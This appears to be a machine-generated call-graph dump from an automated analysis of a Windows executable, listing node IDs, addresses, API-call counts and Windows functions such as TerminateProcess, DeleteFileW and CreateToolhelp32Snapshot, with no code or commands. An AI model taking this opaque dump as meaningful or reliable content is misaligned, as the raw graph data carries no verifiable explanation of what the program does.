40 API calls 103322->103330 103323 f07ad5 8 API calls 103323->103330 103324 f1bbbe 43 API calls 103324->103330 103325 f06c03 8 API calls 103325->103330 103328 f1b1fb 103328->103177 103329 f08ec0 52 API calls 103329->103330 103330->103322 103330->103323 103330->103324 103330->103325 103330->103328 103330->103329 103331 f0c98d 39 API calls 103330->103331 103332 f08577 8 API calls 103330->103332 103333 f0396b 60 API calls 103330->103333 103334 f03907 Shell_NotifyIconW 103330->103334 103779 f0ad40 8 API calls __fread_nolock 103330->103779 103780 f07b1a 8 API calls 103330->103780 103331->103330 103332->103330 103333->103330 103334->103330 103336 f08ec0 52 API calls 103335->103336 103337 f8ad63 103336->103337 103781 f6dd87 CreateToolhelp32Snapshot Process32FirstW 103337->103781 103339 f8ad72 103339->103177 103341 f87b38 103340->103341 103342 f87b52 103340->103342 103800 f73fe1 81 API calls __wsopen_s 103341->103800 103344 f860e6 8 API calls 103342->103344 103345 f87b5d 103344->103345 103346 f10340 205 API calls 103345->103346 103347 f87bc1 103346->103347 103348 f87c5c 103347->103348 103352 f87c03 103347->103352 103371 f87b4a 103347->103371 103349 f87cb0 103348->103349 103350 f87c62 103348->103350 103351 f08ec0 52 API calls 103349->103351 103349->103371 103801 f71ad8 8 API calls 103350->103801 103353 f87cc2 103351->103353 103357 f7148b 8 API calls 103352->103357 103355 f0c2c9 8 API calls 103353->103355 103358 f87ce6 CharUpperBuffW 103355->103358 103356 f87c85 103802 f0bd07 8 API calls 103356->103802 103360 f87c3b 103357->103360 103362 f87d00 103358->103362 103361 f12b20 205 API calls 103360->103361 103361->103371 103363 f87d53 103362->103363 103364 f87d07 103362->103364 103365 f08ec0 52 API calls 103363->103365 103368 f7148b 8 API calls 103364->103368 103366 f87d5b 103365->103366 103803 f1aa65 9 API calls 103366->103803 103369 f87d35 103368->103369 103370 f12b20 205 API calls 103369->103370 103370->103371 103371->103139 103372 f87d65 103372->103371 103373 f08ec0 52 API calls 103372->103373 103374 f87d80 103373->103374 103804 f0bd07 8 API calls 103374->103804 103376->103173 103377->103136 103379 f0b338 _wcslen 103378->103379 103380 f2017b 8 API calls 103379->103380 103381 f0b360 __fread_nolock 103380->103381 103382 f2014b 8 API calls 103381->103382 103383 f0b376 103382->103383 103383->103149 103384->103146 103385->103150 103386->103163 103387->103163 103388->103177 103389->103177 103390->103177 103391->103174 103392->103177 103393->103224 103394->103221 103395->103225 103396->103228 103398 f08ec0 52 API calls 103397->103398 103399 f889ed 103398->103399 103402 f88a32 messages 103399->103402 103435 f89730 103399->103435 103401 f88aa6 103401->103402 103408 f08ec0 52 API calls 103401->103408 103422 f88cde 103401->103422 103467 f64ad3 8 API calls __fread_nolock 103401->103467 103468 f88f7a 41 API calls _strftime 103401->103468 103402->103231 103403 f88eac 103485 f89941 59 API calls 103403->103485 103404 f88cec 103448 f888e3 103404->103448 103407 f88ebb 103407->103404 103409 f88ec7 103407->103409 103408->103401 103409->103402 103414 f88d25 103462 f1ffe0 103414->103462 103417 f88d5f 103470 f07e12 103417->103470 103418 f88d45 103469 f73fe1 81 API calls __wsopen_s 103418->103469 103421 f88d50 GetCurrentProcess TerminateProcess 103421->103417 103422->103403 103422->103404 103426 f88f22 103426->103402 103431 f88f36 FreeLibrary 103426->103431 103428 f88d9e 103482 f895d8 74 API calls 103428->103482 103431->103402 103433 f88daf 103433->103426 103483 f11ca0 8 API calls 103433->103483 103484 f0b4c8 8 API calls 103433->103484 103486 f895d8 74 API calls 103433->103486 103436 f0c2c9 8 API calls 103435->103436 103437 f8974b CharLowerBuffW 103436->103437 103487 f69805 103437->103487 103441 f0bf73 8 API calls 103442 f89787 103441->103442 103494 f0acc0 103442->103494 103444 f8979b 103445 f0adf4 8 API calls 103444->103445 103446 f897a5 _wcslen 103445->103446 103447 f898bb _wcslen 103446->103447 103506 f88f7a 41 API calls _strftime 103446->103506 103447->103401 103449 f88949 103448->103449 103450 f888fe 103448->103450 103454 f89af3 103449->103454 103451 f2017b 8 API calls 103450->103451 103452 f88920 103451->103452 103452->103449 103453 f2014b 8 API calls 103452->103453 103453->103452 103455 f89d08 messages 103454->103455 103456 f89b17 _strcat _wcslen ___std_exception_copy 103454->103456 103455->103414 103456->103455 103457 f0c98d 39 API calls 103456->103457 103458 f0c63f 39 API calls 103456->103458 103459 f0ca5b 39 API calls 103456->103459 103460 f08ec0 52 API calls 103456->103460 103510 f6f8c5 10 API calls _wcslen 103456->103510 103457->103456 103458->103456 103459->103456 103460->103456 103464 f1fff5 103462->103464 103463 f2008d Sleep 103465 f2005b 103463->103465 103464->103463 103464->103465 103466 f2007b CloseHandle 103464->103466 103465->103417 103465->103418 103466->103465 103467->103401 103468->103401 103469->103421 103471 f07e1a 103470->103471 103472 f2014b 8 API calls 103471->103472 103473 f07e28 103472->103473 103511 f08445 103473->103511 103476 f08470 103514 f0c760 103476->103514 103478 f2017b 8 API calls 103480 f0851c 103478->103480 103479 f08480 103479->103478 103479->103480 103480->103433 103481 f11ca0 8 API calls 103480->103481 103481->103428 103482->103433 103483->103433 103484->103433 103485->103407 103486->103433 103488 f69825 _wcslen 103487->103488 103489 f69914 103488->103489 103490 f6985a 103488->103490 103493 f69919 103488->103493 103489->103441 103489->103446 103490->103489 103507 f1e36b 41 API calls 103490->103507 103493->103489 103508 f1e36b 41 API calls 103493->103508 103496 f0ace1 103494->103496 103505 f0accf 103494->103505 103495 f0acda __fread_nolock 103495->103444 103499 f50557 103496->103499 103500 f0ad07 103496->103500 103496->103505 103497 f0c2c9 8 API calls 103498 f505a3 __fread_nolock 103497->103498 103501 f2014b 8 API calls 103499->103501 103509 f088e8 8 API calls 103500->103509 103503 f50561 103501->103503 103504 f2017b 8 API calls 103503->103504 103504->103505 103505->103495 103505->103497 103506->103447 103507->103490 103508->103493 103509->103495 103510->103456 103512 f2014b 8 API calls 103511->103512 103513 f07e30 103512->103513 103513->103476 103515 f0c76b 103514->103515 103516 f51285 103515->103516 103520 f0c773 messages 103515->103520 103517 f2014b 8 API calls 103516->103517 103519 f51291 103517->103519 103518 f0c77a 103518->103479 103520->103518 103522 f0c7e0 8 API calls messages 103520->103522 103522->103520 103557 f702aa 103523->103557 103526 f703f3 103573 f705e9 56 API calls __fread_nolock 103526->103573 103527 f7040b 103529 f70471 103527->103529 103530 f7041b 103527->103530 103531 f70507 103529->103531 103532 f704a1 103529->103532 103547 f70399 __fread_nolock 103529->103547 103554 f70453 103530->103554 103574 f72855 10 API calls 103530->103574 103533 f705b0 103531->103533 103534 f70510 103531->103534 103535 f704a6 103532->103535 103536 f704d1 103532->103536 103533->103547 103582 f0c63f 39 API calls 103533->103582 103537 f70515 103534->103537 103538 f7058d 103534->103538 103535->103547 103577 f0ca5b 39 API calls 103535->103577 103536->103547 103578 f0ca5b 39 API calls 103536->103578 103540 f70554 103537->103540 103541 f7051b 103537->103541 103538->103547 103581 f0c63f 39 API calls 103538->103581 103540->103547 103580 f0c63f 39 API calls 103540->103580 103541->103547 103579 f0c63f 39 API calls 103541->103579 103547->103237 103549 f70427 103575 f72855 10 API calls 103549->103575 103552 f7043e __fread_nolock 103576 f72855 10 API calls 103552->103576 103564 f71844 103554->103564 103555->103233 103556->103238 103558 f702f7 103557->103558 103562 f702bb 103557->103562 103593 f0c98d 39 API calls 103558->103593 103559 f702f5 103559->103526 103559->103527 103559->103547 103561 f08ec0 52 API calls 103561->103562 103562->103559 103562->103561 103583 f24d98 103562->103583 103565 f7184f 103564->103565 103566 f2014b 8 API calls 103565->103566 103567 f71856 103566->103567 103568 f71883 103567->103568 103569 f71862 103567->103569 103571 f2017b 8 API calls 103568->103571 103570 f2017b 8 API calls 103569->103570 103572 f7186b ___scrt_fastfail 103570->103572 103571->103572 103572->103547 103573->103547 103574->103549 103575->103552 103576->103554 103577->103547 103578->103547 103579->103547 103580->103547 103581->103547 103582->103547 103584 f24da6 103583->103584 103585 f24e1b 103583->103585 103589 f24dcb 103584->103589 103594 f2f649 20 API calls _abort 103584->103594 103596 f24e2d 40 API calls 4 library calls 103585->103596 103588 f24e28 103588->103562 103589->103562 103590 f24db2 103595 f32b5c 26 API calls __wsopen_s 103590->103595 103592 f24dbd 103592->103562 103593->103559 103594->103590 103595->103592 103596->103588 103598 f0bf73 8 API calls 103597->103598 103599 f081de 103598->103599 103599->103250 103601 f69a0a 103600->103601 103603 f69a18 103600->103603 103602 f0adf4 8 API calls 103601->103602 103605 f69a16 103602->103605 103615 f08844 8 API calls __fread_nolock 103603->103615 103605->103262 103607 f06a8b 103606->103607 103611 f06aac __fread_nolock 103606->103611 103609 f2017b 8 API calls 103607->103609 103608 f2014b 8 API calls 103610 f06abf 103608->103610 103609->103611 103610->103262 103611->103608 103612->103248 103613->103254 103614->103256 103615->103605 103616->103269 103617->103272 103619 f2017b 8 API calls 103618->103619 103620 f1c209 103619->103620 103621 f2014b 8 API calls 103620->103621 103622 f1c215 103621->103622 103622->103283 103624 f1fa35 103623->103624 103625 f1f9fe 103623->103625 103637 f1fe8a 8 API calls 103624->103637 103627 f2017b 8 API calls 103625->103627 103628 f1fa05 WideCharToMultiByte 103627->103628 103636 f1fa3e 8 API calls __fread_nolock 103628->103636 103630 f1fa29 103630->103288 103631->103281 103632->103286 103634 f2014b 8 API calls 103633->103634 103635 f0424e 103634->103635 103635->103295 103635->103296 103636->103630 103637->103630 103639 f0bf73 8 API calls 103638->103639 103640 f6dc73 103639->103640 103641 f0bf73 8 API calls 103640->103641 103642 f6dc7c 103641->103642 103643 f0bf73 8 API calls 103642->103643 103644 f6dc85 103643->103644 103662 f05851 103644->103662 103649 f6dcab 103674 f0568e 103649->103674 103650 f06b7c 8 API calls 103650->103649 103652 f6dcbf FindFirstFileW 103653 f6dd4b FindClose 103652->103653 103656 f6dcde 103652->103656 103658 f6dd56 103653->103658 103654 f6dd26 FindNextFileW 103654->103656 103655 f0bed9 8 API calls 103655->103656 103656->103653 103656->103654 103656->103655 103657 f07bb5 8 API calls 103656->103657 103659 f06b7c 8 API calls 103656->103659 103657->103656 103658->103304 103660 f6dd17 DeleteFileW 103659->103660 103660->103654 103661 f6dd42 FindClose 103660->103661 103661->103658 103716 f422d0 103662->103716 103665 f05898 103722 f0bd57 103665->103722 103666 f0587d 103667 f08577 8 API calls 103666->103667 103669 f05889 103667->103669 103718 f055dc 103669->103718 103672 f6eab0 GetFileAttributesW 103673 f6dc99 103672->103673 103673->103649 103673->103650 103675 f0bf73 8 API calls 103674->103675 103676 f056a4 103675->103676 103677 f0bf73 8 API calls 103676->103677 103678 f056ac 103677->103678 103679 f0bf73 8 API calls 103678->103679 103680 f056b4 103679->103680 103681 f0bf73 8 API calls 103680->103681 103682 f056bc 103681->103682 103683 f056f0 103682->103683 103684 f44da1 103682->103684 103686 f0acc0 8 API calls 103683->103686 103685 f0bed9 8 API calls 103684->103685 103687 f44daa 103685->103687 103688 f056fe 103686->103688 103690 f0bd57 8 API calls 103687->103690 103689 f0adf4 8 API calls 103688->103689 103691 f05708 103689->103691 103692 f05733 103690->103692 103691->103692 103693 f0acc0 8 API calls 103691->103693 103694 f05754 103692->103694 103709 f05778 103692->103709 103713 f44dcc 103692->103713 103696 f05729 103693->103696 103694->103709 103728 f0655e 103694->103728 103695 f0acc0 8 API calls 103700 f05789 103695->103700 103697 f0adf4 8 API calls 103696->103697 103697->103692 103699 f08577 8 API calls 103712 f44e8c 103699->103712 103702 f0579f 103700->103702 103704 f0bed9 8 API calls 103700->103704 103701 f057b3 103705 f057be 103701->103705 103708 f0bed9 8 API calls 103701->103708 103702->103701 103707 f0bed9 8 API calls 103702->103707 103704->103702 103710 f0bed9 8 API calls 103705->103710 103714 f057c9 103705->103714 103706 f0acc0 8 API calls 103706->103709 103707->103701 103708->103705 103709->103695 103710->103714 103711 f0655e 8 API calls 103711->103712 103712->103709 103712->103711 103731 f0ad40 8 API calls __fread_nolock 103712->103731 103713->103699 103714->103652 103717 f0585e GetFullPathNameW 103716->103717 103717->103665 103717->103666 103719 f055ea 103718->103719 103720 f0adf4 8 API calls 103719->103720 103721 f055fe 103720->103721 103721->103672 103723 f0bd71 103722->103723 103727 f0bd64 103722->103727 103724 f2014b 8 API calls 103723->103724 103725 f0bd7b 103724->103725 103726 f2017b 8 API calls 103725->103726 103726->103727 103727->103669 103729 f0c2c9 8 API calls 103728->103729 103730 f05761 103729->103730 103730->103706 103730->103709 103731->103712 103733 f718b6 103732->103733 103734 f2014b 8 API calls 103733->103734 103735 f718bd 103734->103735 103738 f6fcb5 103735->103738 103737 f718f7 103737->103312 103739 f0c2c9 8 API calls 103738->103739 103740 f6fcc8 CharLowerBuffW 103739->103740 103741 f6fcdb 103740->103741 103742 f6fd19 103741->103742 103743 f0655e 8 API calls 103741->103743 103755 f6fce5 ___scrt_fastfail 103741->103755 103744 f6fd2b 103742->103744 103745 f0655e 8 API calls 103742->103745 103743->103741 103746 f2017b 8 API calls 103744->103746 103745->103744 103749 f6fd59 103746->103749 103751 f6fd7b 103749->103751 103771 f6fbed 8 API calls 103749->103771 103750 f6fdb8 103752 f2014b 8 API calls 103750->103752 103750->103755 103756 f6fe0c 103751->103756 103753 f6fdd2 103752->103753 103754 f2017b 8 API calls 103753->103754 103754->103755 103755->103737 103757 f0bf73 8 API calls 103756->103757 103758 f6fe3e 103757->103758 103759 f0bf73 8 API calls 103758->103759 103760 f6fe47 103759->103760 103761 f0bf73 8 API calls 103760->103761 103763 f6fe50 103761->103763 103762 f70114 103762->103750 103763->103762 103764 f08577 8 API calls 103763->103764 103765 f266f8 GetStringTypeW 103763->103765 103766 f0ad40 8 API calls 103763->103766 103768 f26641 39 API calls 103763->103768 103769 f6fe0c 40 API calls 103763->103769 103770 f0bed9 8 API calls 103763->103770 103772 f26722 GetStringTypeW _strftime 103763->103772 103764->103763 103765->103763 103766->103763 103768->103763 103769->103763 103770->103763 103771->103749 103772->103763 103774 f2014b 8 API calls 103773->103774 103775 f1bc65 103774->103775 103776 f0b329 8 API calls 103775->103776 103777 f1bc70 103776->103777 103777->103320 103778->103330 103779->103330 103780->103330 103791 f6e80e 103781->103791 103783 f6de86 CloseHandle 103783->103339 103784 f6ddd4 Process32NextW 103784->103783 103785 f6ddcd 103784->103785 103785->103783 103785->103784 103786 f0bf73 8 API calls 103785->103786 103787 f0b329 8 API calls 103785->103787 103788 f0568e 8 API calls 103785->103788 103789 f07bb5 8 API calls 103785->103789 103797 f1e36b 41 API calls 103785->103797 103786->103785 103787->103785 103788->103785 103789->103785 103795 f6e819 103791->103795 103792 f6e830 103799 f2666b 39 API calls _strftime 103792->103799 103795->103792 103796 f6e836 103795->103796 103798 f26722 GetStringTypeW _strftime 103795->103798 103796->103785 103797->103785 103798->103795 103799->103796 103800->103371 103801->103356 103802->103371 103803->103372 103804->103371 103805->103198 103806->103198 103807->103197 103808->103201 103809->103103 103810->103097 103811->103098 103812->103098 103813->103024 103814 f10ebf 103815 f10ed3 103814->103815 103821 f11425 103814->103821 103816 f10ee5 103815->103816 103817 f2014b 8 API calls 103815->103817 103818 f5562c 103816->103818 103820 f10f3e 103816->103820 103847 f0b4c8 8 API calls 103816->103847 103817->103816 103848 f71b14 8 API calls 103818->103848 103823 f12b20 206 API calls 103820->103823 103838 f1049d messages 103820->103838 103821->103816 103824 f0bed9 8 API calls 103821->103824 103840 f10376 messages 103823->103840 103824->103816 103825 f5632b 103852 f73fe1 81 API calls __wsopen_s 103825->103852 103826 f11e50 40 API calls 103826->103840 103827 f11695 103832 f0bed9 8 API calls 103827->103832 103827->103838 103829 f55cdb 103836 f0bed9 8 API calls 103829->103836 103829->103838 103830 f5625a 103851 f73fe1 81 API calls __wsopen_s 103830->103851 103831 f10aae messages 103850 f73fe1 81 API calls __wsopen_s 103831->103850 103832->103838 103835 f11990 206 API calls 103835->103840 103836->103838 103837 f0bed9 8 API calls 103837->103840 103839 f0bf73 8 API calls 103839->103840 103840->103825 103840->103826 103840->103827 103840->103829 103840->103830 103840->103831 103840->103835 103840->103837 103840->103838 103840->103839 103841 f20413 29 API calls pre_c_initialization 103840->103841 103842 f205b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103840->103842 103843 f56115 103840->103843 103845 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103840->103845 103846 f2014b 8 API calls 103840->103846 103841->103840 103842->103840 103849 f73fe1 81 API calls __wsopen_s 103843->103849 103845->103840 103846->103840 103847->103816 103848->103838 103849->103831 103850->103838 103851->103838 103852->103838 105049 f51ac5 105050 f51acd 105049->105050 105053 f0d535 105049->105053 105080 f67a87 8 API calls __fread_nolock 105050->105080 105052 f51adf 105081 f67a00 8 API calls __fread_nolock 105052->105081 105056 f2014b 8 API calls 105053->105056 105055 f51b09 105057 f10340 206 API calls 105055->105057 105058 f0d589 105056->105058 105059 f51b30 105057->105059 105061 f0c32d 8 API calls 105058->105061 105060 f51b44 105059->105060 105082 f861a2 53 API calls _wcslen 105059->105082 105063 f0d5b3 105061->105063 105064 f2014b 8 API calls 105063->105064 105071 f0d66e messages 105064->105071 105065 f51b61 105065->105053 105083 f67a87 8 API calls __fread_nolock 105065->105083 105067 f0c3ab 8 API calls 105077 f0d9ac messages 105067->105077 105070 f51f79 105085 f656ae 8 API calls messages 105070->105085 105071->105070 105073 f51f94 105071->105073 105074 f0bed9 8 API calls 105071->105074 105075 f0c3ab 8 API calls 105071->105075 105076 f0d911 messages 105071->105076 105084 f0b4c8 8 API calls 105071->105084 105074->105071 105075->105071 105076->105067 105076->105077 105078 f0d9c3 105077->105078 105079 f1e30a 8 API calls messages 105077->105079 105079->105077 105080->105052 105081->105055 105082->105065 105083->105065 105084->105071 105085->105073 105086 f0f4c0 105089 f1a025 105086->105089 105088 f0f4cc 105090 f1a046 105089->105090 105095 f1a0a3 105089->105095 105092 f10340 206 API calls 105090->105092 105090->105095 105096 f1a077 105092->105096 105093 f5806b 105093->105093 105094 f1a0e7 105094->105088 105095->105094 105098 f73fe1 81 API calls __wsopen_s 105095->105098 105096->105094 105096->105095 105097 f0bed9 8 API calls 105096->105097 105097->105095 105098->105093 105099 f38782 105104 f3853e 105099->105104 105103 f387aa 105109 f3856f try_get_first_available_module 105104->105109 105106 f3876e 105123 f32b5c 26 API calls __wsopen_s 105106->105123 105108 f386c3 105108->105103 105116 f40d04 105108->105116 105112 f386b8 105109->105112 105119 f2917b 40 API calls 2 library calls 105109->105119 105111 f3870c 105111->105112 105120 f2917b 40 API calls 2 library calls 105111->105120 105112->105108 105122 f2f649 20 API calls _abort 105112->105122 105114 f3872b 105114->105112 105121 f2917b 40 API calls 2 library calls 105114->105121 105124 f40401 105116->105124 105118 f40d1f 105118->105103 105119->105111 105120->105114 105121->105112 105122->105106 105123->105108 105126 f4040d ___BuildCatchObject 105124->105126 105125 f4041b 105182 f2f649 20 API calls _abort 105125->105182 105126->105125 105128 f40454 105126->105128 105135 f409db 105128->105135 105129 f40420 105183 f32b5c 26 API calls __wsopen_s 105129->105183 105134 f4042a __wsopen_s 105134->105118 105185 f407af 105135->105185 105138 f40a26 105203 f35594 105138->105203 105139 f40a0d 105217 f2f636 20 API calls _abort 105139->105217 105142 f40a2b 105143 f40a34 105142->105143 105144 f40a4b 105142->105144 105219 f2f636 20 API calls _abort 105143->105219 105216 f4071a CreateFileW 105144->105216 105148 f40a39 105220 f2f649 20 API calls _abort 105148->105220 105149 f40478 105184 f404a1 LeaveCriticalSection __wsopen_s 105149->105184 105151 f40b01 GetFileType 105152 f40b53 105151->105152 105153 f40b0c GetLastError 105151->105153 105225 f354dd 21 API calls 2 library calls 105152->105225 105223 f2f613 20 API calls __dosmaperr 105153->105223 105154 f40a12 105218 f2f649 20 API calls _abort 105154->105218 105155 f40ad6 GetLastError 105222 f2f613 20 API calls __dosmaperr 105155->105222 105158 f40a84 105158->105151 105158->105155 105221 f4071a CreateFileW 105158->105221 105159 f40b1a CloseHandle 105159->105154 105163 f40b43 105159->105163 105162 f40ac9 105162->105151 105162->105155 105224 f2f649 20 API calls _abort 105163->105224 105164 f40b74 105166 f40bc0 105164->105166 105226 f4092b 72 API calls 3 library calls 105164->105226 105171 f40bed 105166->105171 105227 f404cd 72 API calls 4 library calls 105166->105227 105167 f40b48 105167->105154 105170 f40be6 105170->105171 105172 f40bfe 105170->105172 105228 f38a2e 105171->105228 105172->105149 105174 f40c7c CloseHandle 105172->105174 105243 f4071a CreateFileW 105174->105243 105176 f40ca7 105177 f40cb1 GetLastError 105176->105177 105178 f40cdd 105176->105178 105244 f2f613 20 API calls __dosmaperr 105177->105244 105178->105149 105180 f40cbd 105245 f356a6 21 API calls 2 library calls 105180->105245 105182->105129 105183->105134 105184->105134 105186 f407d0 105185->105186 105191 f407ea 105185->105191 105186->105191 105253 f2f649 20 API calls _abort 105186->105253 105189 f407df 105254 f32b5c 26 API calls __wsopen_s 105189->105254 105246 f4073f 105191->105246 105192 f40851 105201 f408a4 105192->105201 105257 f2da7d 26 API calls 2 library calls 105192->105257 105193 f40822 105193->105192 105255 f2f649 20 API calls _abort 105193->105255 105196 f4089f 105198 f4091e 105196->105198 105196->105201 105197 f40846 105256 f32b5c 26 API calls __wsopen_s 105197->105256 105258 f32b6c 11 API calls _abort 105198->105258 105201->105138 105201->105139 105202 f4092a 105204 f355a0 ___BuildCatchObject 105203->105204 105261 f332d1 EnterCriticalSection 105204->105261 105207 f355cc 105209 f35373 __wsopen_s 21 API calls 105207->105209 105208 f35617 __wsopen_s 105208->105142 105211 f355d1 105209->105211 105210 f355a7 105210->105207 105212 f3563a EnterCriticalSection 105210->105212 105214 f355ee 105210->105214 105211->105214 105265 f354ba EnterCriticalSection 105211->105265 105213 f35647 LeaveCriticalSection 105212->105213 105212->105214 105213->105210 105262 f3569d 105214->105262 105216->105158 105217->105154 105218->105149 105219->105148 105220->105154 105221->105162 105222->105154 105223->105159 105224->105167 105225->105164 105226->105166 105227->105170 105229 f35737 __wsopen_s 26 API calls 105228->105229 105232 f38a3e 105229->105232 105230 f38a44 105267 f356a6 21 API calls 2 library calls 105230->105267 105232->105230 105235 f35737 __wsopen_s 26 API calls 105232->105235 105242 f38a76 105232->105242 105233 f35737 __wsopen_s 26 API calls 105236 f38a82 CloseHandle 105233->105236 105234 f38a9c 105237 f38abe 105234->105237 105268 f2f613 20 API calls __dosmaperr 105234->105268 105238 f38a6d 105235->105238 105236->105230 105239 f38a8e GetLastError 105236->105239 105237->105149 105241 f35737 __wsopen_s 26 API calls 105238->105241 105239->105230 105241->105242 105242->105230 105242->105233 105243->105176 105244->105180 105245->105178 105247 f40757 105246->105247 105248 f40772 105247->105248 105259 f2f649 20 API calls _abort 105247->105259 105248->105193 105250 f40796 105260 f32b5c 26 API calls __wsopen_s 105250->105260 105252 f407a1 105252->105193 105253->105189 105254->105191 105255->105197 105256->105192 105257->105196 105258->105202 105259->105250 105260->105252 105261->105210 105266 f33319 LeaveCriticalSection 105262->105266 105264 f356a4 105264->105208 105265->105214 105266->105264 105267->105234 105268->105237 105269 f01044 105274 f02793 105269->105274 105271 f0104a 105310 f20413 29 API calls __onexit 105271->105310 105273 f01054 105311 f02a38 105274->105311 105278 f0280a 105279 f0bf73 8 API calls 105278->105279 105280 f02814 105279->105280 105281 f0bf73 8 API calls 105280->105281 105282 f0281e 105281->105282 105283 f0bf73 8 API calls 105282->105283 105284 f02828 105283->105284 105285 f0bf73 8 API calls 105284->105285 105286 f02866 105285->105286 105287 f0bf73 8 API calls 105286->105287 105288 f02932 105287->105288 105321 f02dbc 105288->105321 105292 f02964 105293 f0bf73 8 API calls 105292->105293 105294 f0296e 105293->105294 105295 f13160 9 API calls 105294->105295 105296 f02999 105295->105296 105348 f03166 105296->105348 105298 f029b5 105299 f029c5 GetStdHandle 105298->105299 105300 f439e7 105299->105300 105301 f02a1a 105299->105301 105300->105301 105302 f439f0 105300->105302 105304 f02a27 OleInitialize 105301->105304 105303 f2014b 8 API calls 105302->105303 105305 f439f7 105303->105305 105304->105271 105355 f70ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 105305->105355 105307 f43a00 105356 f712eb CreateThread 105307->105356 105309 f43a0c CloseHandle 105309->105301 105310->105273 105357 f02a91 105311->105357 105314 f02a91 8 API calls 105315 f02a70 105314->105315 105316 f0bf73 8 API calls 105315->105316 105317 f02a7c 105316->105317 105318 f08577 8 API calls 105317->105318 105319 f027c9 105318->105319 105320 f0327e 6 API calls 105319->105320 105320->105278 105322 f0bf73 8 API calls 105321->105322 105323 f02dcc 105322->105323 105324 f0bf73 8 API calls 105323->105324 105325 f02dd4 105324->105325 105326 f081d6 8 API calls 105325->105326 105327 f02ddc 105326->105327 105328 f081d6 8 API calls 105327->105328 105329 f02de4 105328->105329 105330 f0bf73 8 API calls 105329->105330 105331 f02def 105330->105331 105332 f2014b 8 API calls 105331->105332 105333 f0293c 105332->105333 105334 f03205 105333->105334 105335 f03213 105334->105335 105336 f0bf73 8 API calls 105335->105336 105337 f0321e 105336->105337 105338 f0bf73 8 API calls 105337->105338 105339 f03229 105338->105339 105340 f0bf73 8 API calls 105339->105340 105341 f03234 105340->105341 105342 f0bf73 8 API calls 105341->105342 105343 f0323f 105342->105343 105344 f081d6 8 API calls 105343->105344 105345 f0324a 105344->105345 105346 f2014b 8 API calls 105345->105346 105347 f03251 RegisterWindowMessageW 105346->105347 105347->105292 105349 f03176 105348->105349 105350 f43c8f 105348->105350 105352 f2014b 8 API calls 105349->105352 105364 f73c4e 8 API calls 105350->105364 105354 f0317e 105352->105354 105353 f43c9a 105354->105298 105355->105307 105356->105309 105365 f712d1 14 API calls 105356->105365 105358 f0bf73 8 API calls 105357->105358 105359 f02a9c 105358->105359 105360 f0bf73 8 API calls 105359->105360 105361 f02aa4 105360->105361 105362 f0bf73 8 API calls 105361->105362 105363 f02a66 105362->105363 105363->105314 105364->105353 103853 f0f5e5 103856 f0cab0 103853->103856 103855 f0f5f3 103857 f0cacb 103856->103857 103858 f5150c 103857->103858 103859 f514be 103857->103859 103867 f0caf0 103857->103867 103901 f862ff 206 API calls 2 library calls 103858->103901 103862 f514c8 103859->103862 103865 f514d5 103859->103865 103859->103867 103899 f86790 206 API calls 103862->103899 103864 f1bc58 8 API calls 103864->103867 103884 f0cdc0 103865->103884 103900 f86c2d 206 API calls 2 library calls 103865->103900 103867->103864 103871 f0cf80 39 API calls 103867->103871 103872 f1e807 39 API calls 103867->103872 103875 f0cdee 103867->103875 103876 f516e8 103867->103876 103880 f0cf70 103867->103880 103867->103884 103885 f10340 206 API calls 103867->103885 103886 f0bed9 8 API calls 103867->103886 103888 f0be2d 103867->103888 103892 f1e7c1 39 API calls 103867->103892 103893 f1aa99 206 API calls 103867->103893 103894 f205b2 5 API calls __Init_thread_wait 103867->103894 103895 f20413 29 API calls __onexit 103867->103895 103896 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103867->103896 103897 f1f4df 81 API calls 103867->103897 103898 f1f346 206 API calls 103867->103898 103902 f0b4c8 8 API calls 103867->103902 103903 f5ffaf 8 API calls 103867->103903 103869 f5179f 103869->103869 103871->103867 103872->103867 103875->103855 103904 f86669 81 API calls 103876->103904 103880->103855 103884->103880 103905 f73fe1 81 API calls __wsopen_s 103884->103905 103885->103867 103886->103867 103889 f0be38 103888->103889 103890 f0be67 103889->103890 103906 f0bfa5 103889->103906 103890->103867 103892->103867 103893->103867 103894->103867 103895->103867 103896->103867 103897->103867 103898->103867 103899->103865 103900->103884 103901->103867 103902->103867 103903->103867 103904->103884 103905->103869 103923 f0cf80 103906->103923 103908 f0bfb5 103909 f50db6 103908->103909 103910 f0bfc3 103908->103910 103932 f0b4c8 8 API calls 103909->103932 103911 f2014b 8 API calls 103910->103911 103913 f0bfd4 103911->103913 103915 f0bf73 8 API calls 103913->103915 103914 f50dc1 103916 f0bfde 103915->103916 103917 f0bfed 103916->103917 103918 f0bed9 8 API calls 103916->103918 103919 f2014b 8 API calls 103917->103919 103918->103917 103920 f0bff7 103919->103920 103931 f0be7b 39 API calls 103920->103931 103922 f0c01b 103922->103890 103924 f0d1c7 103923->103924 103928 f0cf93 103923->103928 103924->103908 103926 f0bf73 8 API calls 103926->103928 103927 f0d03d 103927->103908 103928->103926 103928->103927 103933 f205b2 5 API calls __Init_thread_wait 103928->103933 103934 f20413 29 API calls __onexit 103928->103934 103935 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103928->103935 103931->103922 103932->103914 103933->103928 103934->103928 103935->103928 103936 f2076b 103937 f20777 ___BuildCatchObject 103936->103937 103966 f20221 103937->103966 103939 f208d1 104004 f20baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103939->104004 103941 f2077e 103941->103939 103943 f207a8 103941->103943 103942 f208d8 104005 f251c2 28 API calls _abort 103942->104005 103953 f207e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103943->103953 103977 f327ed 103943->103977 103945 f208de 104006 f25174 28 API calls _abort 103945->104006 103949 f208e6 103950 f207c7 103952 f20848 103985 f20cc9 103952->103985 103953->103952 104000 f2518a 38 API calls 2 library calls 103953->104000 103955 f2084e 103989 f0331b 103955->103989 103960 f2086a 103960->103942 103961 f2086e 103960->103961 103962 f20877 103961->103962 104002 f25165 28 API calls _abort 103961->104002 104003 f203b0 13 API calls 2 library calls 103962->104003 103965 f2087f 103965->103950 103967 f2022a 103966->103967 104007 f20a08 IsProcessorFeaturePresent 103967->104007 103969 f20236 104008 f23004 10 API calls 3 library calls 103969->104008 103971 f2023b 103976 f2023f 103971->103976 104009 f32687 103971->104009 103974 f20256 103974->103941 